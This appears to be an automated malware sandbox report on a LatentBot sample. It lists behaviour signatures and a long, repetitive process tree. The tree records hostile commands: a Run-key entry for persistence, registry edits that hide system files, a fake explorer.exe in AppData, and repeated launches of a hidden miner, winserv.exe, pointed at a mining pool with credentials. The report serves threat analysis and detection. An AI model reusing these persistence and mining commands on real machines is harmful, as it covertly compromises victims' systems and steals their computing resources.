Analysis Overview
SHA256
492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
Threat Level: Known bad
The file JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af was found to be: Known bad.
Malicious Activity Summary
Latentbot family
LatentBot
Modifies visiblity of hidden/system files in Explorer
Executes dropped EXE
Adds Run key to start application
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-20 05:30
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-20 05:30
Reported
2025-04-20 05:32
Platform
win10v2004-20250410-en
Max time kernel
18s
Max time network
147s
Command Line
Signatures
LatentBot
Latentbot family
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
